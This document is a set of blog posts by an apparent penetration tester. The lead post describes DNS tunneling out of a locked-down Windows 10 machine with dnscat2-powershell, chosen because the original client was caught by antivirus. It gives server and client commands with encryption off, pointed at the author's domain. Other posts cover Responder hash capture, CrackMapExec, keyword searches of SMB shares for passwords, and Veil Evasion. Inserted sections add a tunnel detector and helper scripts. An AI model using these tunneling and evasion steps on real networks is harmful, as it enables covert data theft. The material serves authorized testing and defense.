Now, after this sidetracking, we can get back to the main topic. If you've read some of the links, you'll have seen that there are a whole number of resource record types that can be configured in DNS, including the TXT record, which lets you attach arbitrary text to a domain. This can be useful in situations where regular browsing over HTTP isn't working, whether because you have to pay Delta a ton of money to browse their in-flight wifi, or pay a hotel to use the wifi, or because a pesky network administrator has blocked all outbound HTTP communication and isn't monitoring DNS. Why not use TXT records to hold other types of data and make a data tunnel over DNS?

Enter DNS tunneling. Guides are available everywhere; here's the best image I've found:


Some colleagues and I used DNS tunneling to prove it was possible to send data outbound from a locked-down Windows 10 machine meant for a secure environment to a server under my control. I mostly followed this guide: https://zeltser.com/c2-dns-tunneling/, but used a PowerShell rewrite of the DnsCat2 client created by the folks at BlackHillsInfosec, dnscat2-powershell, as the original client executable was flagged by antivirus and immediately removed.

The domain I used was "yosefkerzner.com", and in A2Hosting the settings were set as follows:
  1. Visit https://my.a2hosting.com/clientarea.php?action=domaindetails
  2. Click the entry that says "Private Nameservers". Register a NameServer Name. In my case it was dns1.yosefkerzner.com. Enter the IP address of the droplet created during the guide above, and click "Save Changes". Create another one for dns2.
  3. Now, click the section titled "Nameservers". Click "Use Custom Nameservers" and enter your private nameservers, e.g. dns1.yosefkerzner.com and dns2.yosefkerzner.com.
  4. Click "Change Nameservers" and wait 24-48 hours as the nameserver information gets propagated across the web. Watch whatever content hosted originally on your domain disappear.

I encountered the following issues with Dnscat2:
  • The tunnel created was highly unstable.
    • It did not tolerate being idle, as eventually DNS queries would get jumbled up and the tunnel would break, so eventually I simply launched long queries such as a dump of running processes to keep the tunnel alive while researching what else could be exfiltrated.
    • I was forced to launch a connection first, and only then to drop into a reverse shell. Command shells didn't work at all, though console connections did if I wanted to type text in the client and see it on the server.
    • Security tunnel options included in the tool also caused instability, so I had to operate it without security or secret passphrases, e.g.:
      • On the server: ruby ./dnscat2.rb --security=open --no-cache --dns="domain=yosefkerzner.com"
      • On the client: Start-Dnscat2 -Domain yosefkerzner.com -NoEncryption
  • Uploading and Downloading didn't work at all, even for small files.

All in all it was a fun experience and a great proof of concept of the importance of security controls for DNS. To prevent DNS tunneling, consider limiting outbound DNS or using DNSSEC, and monitor for large DNS volumes, because no client needs to be sending vast quantities of DNS queries to an unknown IP address.
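As an added example, not from the original post and not part of the dnscat2 project, here is the kind of volume-and-shape check the paragraph above recommends, written against the dnsmasq query log that Pi-hole keeps (the "query[TYPE] name from client" lines). The sample log lines, the tunnel.example.net domain, the 192.168.3.150 client and the thresholds are all constructed for the example; the registered domain is approximated as the last two labels, which is a simplification that misfires for names under public suffixes such as co.uk.

```shell
#!/bin/bash
# Added example (not from the original post): flag clients whose DNS queries
# look like a tunnel, using the dnsmasq query log that Pi-hole keeps.
# Assumptions: lines are in dnsmasq's "query[TYPE] name from client" form
# without a syslog hostname field (as in /var/log/pihole.log), the registered
# domain is approximated by the last two labels, and thresholds are illustrative.

# Constructed sample log. The first lines are ordinary browsing (the
# www.yosefkerzner.com lookup from the post, CNAME then A); the rest are one
# client issuing many unique, long, hex-looking subdomains under a single
# domain, which is the shape a dnscat2-style tunnel produces.
SAMPLE_LOG=$(cat <<'EOF'
Mar 21 10:15:02 dnsmasq[555]: query[A] www.yosefkerzner.com from 192.168.3.107
Mar 21 10:15:02 dnsmasq[555]: forwarded www.yosefkerzner.com to 8.8.8.8
Mar 21 10:15:02 dnsmasq[555]: reply www.yosefkerzner.com is <CNAME>
Mar 21 10:15:02 dnsmasq[555]: reply yosefkerzner.com is 75.98.175.85
Mar 21 10:15:09 dnsmasq[555]: query[AAAA] www.yosefkerzner.com from 192.168.3.107
Mar 21 10:15:40 dnsmasq[555]: query[A] www.google.com from 192.168.3.107
Mar 21 10:16:01 dnsmasq[555]: query[TXT] 4f2a9c1e7b3d8a6f0c5e2b9d4a7f1c3e.tunnel.example.net from 192.168.3.150
Mar 21 10:16:02 dnsmasq[555]: query[TXT] 1c3e4a7f2b9d0c5e8a6f7b3d9c1e4f2a.tunnel.example.net from 192.168.3.150
Mar 21 10:16:03 dnsmasq[555]: query[A] a1b2c3d4e5f60718293a4b5c6d7e8f90.tunnel.example.net from 192.168.3.150
Mar 21 10:16:04 dnsmasq[555]: query[TXT] 0f1e2d3c4b5a69788796a5b4c3d2e1f0.tunnel.example.net from 192.168.3.150
Mar 21 10:16:05 dnsmasq[555]: query[CNAME] deadbeef0123456789abcdef00112233.tunnel.example.net from 192.168.3.150
Mar 21 10:16:06 dnsmasq[555]: query[TXT] 33221100fedcba9876543210feebdaed.tunnel.example.net from 192.168.3.150
EOF
)

# Usage: flag_dns_tunnel_candidates LOGFILE [MIN_UNIQUE] [MAX_LEN]
# Prints one line per (client, domain) pair that trips either threshold:
#   client domain unique_names total_queries longest_name_length
flag_dns_tunnel_candidates() {
    local log="$1" min_unique="${2:-20}" max_len="${3:-60}"
    awk -v min_unique="$min_unique" -v max_len="$max_len" '
        /dnsmasq\[[0-9]+\]: query\[/ {
            name = $(NF-2); client = $NF          # "... query[A] NAME from CLIENT"
            n = split(name, lab, ".")
            dom = (n >= 2) ? lab[n-1] "." lab[n] : name   # crude registered domain
            key = client " " dom
            total[key]++
            if (!seen[key, name]++) uniq[key]++  # distinct names per client+domain
            if (length(name) > longest[key]) longest[key] = length(name)
        }
        END {
            for (k in total)
                if (uniq[k] >= min_unique || longest[k] > max_len)
                    print k, uniq[k], total[k], longest[k]
        }
    ' "$log"
}

# Demo over the constructed sample, with thresholds lowered to fit its size.
demo() {
    local f; f=$(mktemp)
    printf '%s\n' "$SAMPLE_LOG" > "$f"
    flag_dns_tunnel_candidates "$f" 5 60
    rm -f "$f"
}
```

On a real Pi-hole you would run the function over /var/log/pihole.log with thresholds sized to your network; the benign client never trips it, because a handful of lookups for www.yosefkerzner.com and www.google.com produces few distinct names and short ones. A hit is a prompt to look at the client, not an automatic block: a CDN or an anti-virus cloud lookup service can also generate many unique subdomains, so the next step is checking what the names under that domain look like and whether the volume is sustained.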

Tuesday, March 20, 2018

Reading fun stuff

Thanks to a fortunate stroke of luck, I'm in another city in a holding pattern, waiting on a client to give me (us) work to do. In the meantime there's stuff to read and news inputs to improve, e.g. TweetDeck - now it's all pretty and Twitter is usable for information again.

https://arxiv.org/pdf/1803.03453v1.pdf - my favorite video from this paper is the following: Evolving Soft Robots with Multiple Materials

Was also sent this article about Getting up to Speed with Ethereum, and indeed it's quite the crash course. Currently I'm bogged down in the Ethereum DNS-equivalent proposal and envisioning alternate browsers. Oh wait, there already is one, kinda, called Mist.

After the Ethereum crash course I plan to read through the resources on this Technet article about Active Directory and only then start creating an Active Directory lab.

With all this spare time, I'm also making improvements to music downloading scripts and other random stuff. For instance, yesterday afternoon was spent in a frustrating attempt to get the Pineapple Nano "Portal Auth" and "Captive Portal" modules to work, but no matter what I do, cloning websites just doesn't work. The nano's native ASH shell doesn't help either. I'll keep at it but at some point it will be easier to just host my own web server, with a copy of the login portal, then host the portal somehow and overpower nearby broadcast APs with my signal.

In other news, I'd installed a new Graylog VM to take Nzyme inputs on a system with more resources. It worked fine for a few days while connected to the homelab, but apparently on VPN it can't take the same input... which makes sense given that it's got the NAT'ed address. What's worse, even on NAT the web interface fails to load completely all while the CPU usage is completely maxed. So that's another thing to hunt down, because I'd like to gather 10-20 GB worth of data to mess with yet some other time.

Friday, March 16, 2018

Projects Update

I think I'll start posting these sorts of updates regularly, not least as a way of keeping track for myself (brain dump hehe).

Ever since Italy, and even before that, I've been in a bit of a funk, still interested in infosec but wishing for something else. This probably isn't related to work, but for now it might be due to stagnation of new ideas/areas. Maybe it would make sense to study at coffee places (can't say coffeeshop after Amsterdam) in more social environments.

Anyway, here's a list of pending projects:

  • Still need to setup Active Directory
  • Still need to setup the wireless lab environment for the Defcon Enterprise Wifi hacking lab
  • Still need to set up the raspberry pi to stream ragas
  • Streamline password-cracking process using a new GTX 970 combined with WakeOnLan
    • This will include hashcat wordlists plus rules
  • Read all the books, and especially Network+ for more ideas
  • Sit down and think of the best form factor for an always-on VM machine. As much as the current machine (which is a trash save, having previously been one of my dad's PCs) works, it's still 9 years old, dual core, max 8 GB DDR2 non-ECC RAM, with a 160 GB spinning disk, and as I discovered yesterday simply can't handle newer operating systems such as an always-available Kali Linux system. Intel NUCs look nice, though I'd like the lowest operating noise level possible. Maybe I'll upgrade the current box instead.
  • Try implementing an SSO solution for the homelab. With just a few certificates for VPN I can already foresee certificate management being a nightmare, let alone implementing SSH certificates everywhere. 
  • Try implementing a vulnerability management program. For some reason, identical versions of Raspbian can have different outdated versions of Apache even when fully upgraded - so how are these prioritized?
  • Try again to get ICMP ping to work within the LAN.
  • Track down pesky Plex issues. 

I'll post more items later.

Tuesday, February 27, 2018

More fun with Downloading Youtube Videos - old post October 2017

If you use youtube-dl to download playlists, the download speed will often slow to a crawl. You can get around that in two ways: 1) keep the terminal where the script is running open, or 2) issue the command inside the screen tool, e.g. "screen sudo youtube-dl <playlist URL>", then press Ctrl-A followed by D to detach, close the window (PuTTY), and go about your merry way.



Website temporarily down

www.yosefkerzner.com is temporarily offline due to being used in a DNS tunneling test. The test was successful and I will eventually post about it.

As such, I can't share a script written today for removing duplicates from wordlists for hashcat.

1. awk '!seen[$0]++' filename is nice and all, but it uses all the RAM available, slows down considerably once a file is more than 600 MB, and basically never finishes after that point.

2. sort -u -o uses 60% of available RAM and all CPUs, and takes possibly three times as long as option 1.

I wrote a script to split the input file into 160-megabyte pieces, which seems like a good best-speed size and limits RAM usage to under 3 GB per sorting. Option 1 command is then run on each piece, then they get concatenated back into a single large file.

First benchmarks (i5 2310):

On a 3.5 GB wordlist (which was already deduplicated mind you), the script took 7.15 minutes to complete.

On an 8.3 GB wordlist (mostly deduplicated), the script took 19.5 minutes to complete.

Deduping rockyou.txt takes 18 seconds.

Update: Site's back up, here's the script.
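As an added illustration of the chunked approach described above (my own sketch, not the author's script, which lives on the linked site), here is the split/awk/concatenate procedure as a shell function, next to the sort-based alternative from option 2 with a memory cap. It assumes GNU coreutils: split -C keeps whole lines per chunk, which -b would not, and sort -S limits the buffer size. The sample wordlist in the test is constructed.

```shell
#!/bin/bash
# Added example (not the author's script): dedupe a large wordlist chunk by
# chunk as the post describes: split into fixed-size pieces, run the
# awk '!seen[$0]++' filter on each piece, then concatenate the pieces.
# Assumes GNU coreutils (split -C, sort -S).

# Usage: dedup_by_chunks INFILE OUTFILE [CHUNK_SIZE]   (default 160m, as in the post)
dedup_by_chunks() {
    local src="$1" dst="$2" size="${3:-160m}"
    local tmp; tmp=$(mktemp -d)
    # -C splits on line boundaries, so no candidate password is cut in half.
    split -C "$size" -a 4 "$src" "$tmp/chunk_"
    : > "$dst"
    for c in "$tmp"/chunk_*; do
        # awk's seen[] array only has to hold one chunk's worth of lines,
        # which is what bounds the RAM usage.
        awk '!seen[$0]++' "$c" >> "$dst"
    done
    rm -rf "$tmp"
}

# Exact global dedupe for comparison: let sort cap its own buffer instead of
# chunking. Output is sorted, so original ordering is lost.
dedup_global() {
    local src="$1" dst="$2" size="${3:-160M}"
    LC_ALL=C sort -u -S "$size" -o "$dst" "$src"
}
```

One caveat worth knowing before trusting the numbers: per-chunk awk only removes a duplicate when both copies land in the same chunk, so a word that recurs in two different 160 MB pieces survives, and the output is smaller but not fully deduplicated. For an already mostly deduplicated list that hardly matters; for a fresh merge of many lists, sort -u with a memory cap is the exact version, at the cost of ordering.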

Friday, February 23, 2018

Script to download daily Performance Today episodes

Call it whatever, such as pt.sh, and put it in cron as follows:

 # /etc/crontab entry (system crontab format, so it carries the user field):
 0 9 * * 1-6 root /home/pi/Programs/pt.sh


 #!/bin/bash
 # Download both hours of today's Performance Today episode.
 # date +%Y/%m/%d builds the directory part of the URL, date +%Y%m%d the file-name stamp.
 DEST=/mnt/usb/Music/Radio/Performance_Today/
 DAY_PATH=$(date +%Y/%m/%d)
 DAY_STAMP=$(date +%Y%m%d)
 # Hour 1
 wget -P "$DEST" "download.publicradio.org/performance_today/$DAY_PATH/pt1_${DAY_STAMP}_128.mp3"
 # Hour 2
 wget -P "$DEST" "download.publicradio.org/performance_today/$DAY_PATH/pt2_${DAY_STAMP}_128.mp3"

Tuesday, February 20, 2018

Silent new feature in Firefox - First Party Isolation

https://news.slashdot.org/story/17/11/20/1713235/another-tor-browser-feature-makes-it-into-firefox-first-party-isolation

Another item to add to the list

Monday, February 05, 2018

Cool tool for SMB searching

SMBMap - on my last engagement this would have come in handy. Look you can even search by regex patterns across a list of IPs or file shares. Now script it for keywords like "legal", "accounting", "sales", "passwords","termination","future", etc.

Tuesday, January 30, 2018

SNMP with Synology NAS

In a post from November I'd mentioned trying to get this to work and failing:

"Update (For the life of me, can't get this to work): http://blog.tafkas.net/2015/01/15/monitoring-a-synology-diskstation-with-munin/"

Now I finally got it working. The key was to make sure that when the article says "Therefore create a file inside /etc/munin/plugin-conf.d/ folder with the name of the host (e.g. diskstation) containing two lines:" I used the FQDN as returned by a ping. I finally got the pihole working with the Ubiquiti router by setting the local LAN to use it directly and the router as secondary DNS, and added some entries to the pihole's /etc/hosts file to map certain hosts to names under the domain (e.g. server.homenet). Then the file in /etc/munin/plugin-conf.d/ was named server.homenet and included the following two lines:

[snmp_server.HomeNet_*]
env.community secret_string

I also included the following in munin.conf:


[server.HomeNet]
    address 127.0.0.1
    use_node_name no

And made sure to restart munin-node and munin on the Munin server itself. 

Update: The same process can be followed for any device that supports SNMP, such as a router.

Wednesday, January 24, 2018

So much yet to learn

A recent pentest exposed to me in full gory detail how much I still don't know about working in AD and its various terminologies. For the first time in a while I was able to successfully capture and crack NetNTLMv2 hashes captured using Responder. However, I was stymied by Metasploit's psexec not working, until I stumbled across CrackMapExec and found that requests spawned with WMI worked but psexec didn't. Then I slowly made my way to various systems and discovered that I don't know nearly enough about what can actually be done with Domain Admin. I could even potentially have used impersonation/delegation tokens for DAs but decided not to.

So now my priority goals going forward are two-fold:

1. Set up an Active Directory lab at home. There are plenty of guides available. Most likely it would be on my Thinkpad T460p, which was purchased almost specifically for this purpose. (Now if I can just get it to stop shutting off every time the battery wiggles inadvertently...) This gives it the element of portability.

2. Really practice with some VMs. Set up some sort of environment which requires heavy use of Metasploit and meterpreter to obtain elevated privileges/credentials/access/whatever. That way I won't flail around when encountering an AD environment.

Of course I'll also finish setting up the new EdgeRouter X courtesy of this guide: https://github.com/mjp66/Ubiquiti. I would never have managed the job without this document. The only things remaining are resolving some DNS issues, getting the Tor relay back up and running either on its own untrusted network or SSH-limited on the same home network, and changing the Edgerouter to use DNSMasq and getting the pihole to serve DNS requests instead.

 

Monday, January 22, 2018

Installing Veil Evasion in Kali Linux

This issue could be specific to this laptop model, an HP EliteBook 8460p, but if not I hope someone will find this information useful. If installing Veil from https://github.com/Veil-Framework/Veil-Evasion, you may encounter a problem after restarting the machine where X (the graphical environment) just won't start. For reference, I use Gnome on Kali 2017.2. The problem is that the installation of Wine performed as part of the Veil install removes three critical packages: libqt4-opengl-dev, libglu1-mesa-dev and libgl1-mesa-dev. An apt-get install of these should fix the issue. I would recommend adding them back as soon as the Veil install has finished; otherwise you'll need to boot into safe mode, bring up a network interface (for eth0 on a DHCP-enabled network you can plug in a network cable and start NetworkManager), and install them from there.
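As an added check, not part of the original post or of the Veil project, here is a small script that confirms the three packages named above are still installed after the Veil/Wine install and reinstalls any that are not, so the machine can be verified before it is rebooted. It assumes a Debian-based system with dpkg-query and apt-get; the parsing step takes dpkg-query's status lines on stdin so it can be exercised with constructed input.

```shell
#!/bin/bash
# Added example (not from the Veil project or the original post): verify that
# the packages the Wine install is reported to remove are still present after
# installing Veil, and reinstall any that are missing, before rebooting.
# Assumes a Debian-based system (dpkg-query, apt-get).

REQUIRED_PKGS="libqt4-opengl-dev libglu1-mesa-dev libgl1-mesa-dev"

# Print, sorted, the names in $1 (space-separated) that stdin does not report as
# installed. Expected stdin format is what
#   dpkg-query -W -f='${Package} ${Status}\n' PKG...
# prints, e.g. "libgl1-mesa-dev install ok installed". A package that was
# removed but left config files shows "deinstall ok config-files"; one dpkg
# has never seen produces no line at all (only an error on stderr). Both count
# as missing here.
missing_from_status() {
    awk -v want="$1" '
        BEGIN { n = split(want, names, " "); for (i = 1; i <= n; i++) need[names[i]] = 1 }
        / install ok installed$/ { delete need[$1] }
        END { for (p in need) print p }
    ' | sort
}

# Live check against dpkg, then reinstall whatever is missing.
check_and_restore() {
    local missing
    # shellcheck disable=SC2086  (word splitting of the package list is intended)
    missing=$(dpkg-query -W -f='${Package} ${Status}\n' $REQUIRED_PKGS 2>/dev/null \
              | missing_from_status "$REQUIRED_PKGS")
    if [ -n "$missing" ]; then
        echo "Missing after the Veil/Wine install: $missing" >&2
        # shellcheck disable=SC2086
        apt-get install -y $missing
    else
        echo "All required X/OpenGL development packages are present."
    fi
}
```

Run check_and_restore as root right after the Veil installer finishes and before the reboot; if it reports nothing missing, the X breakage described above has a different cause on your machine.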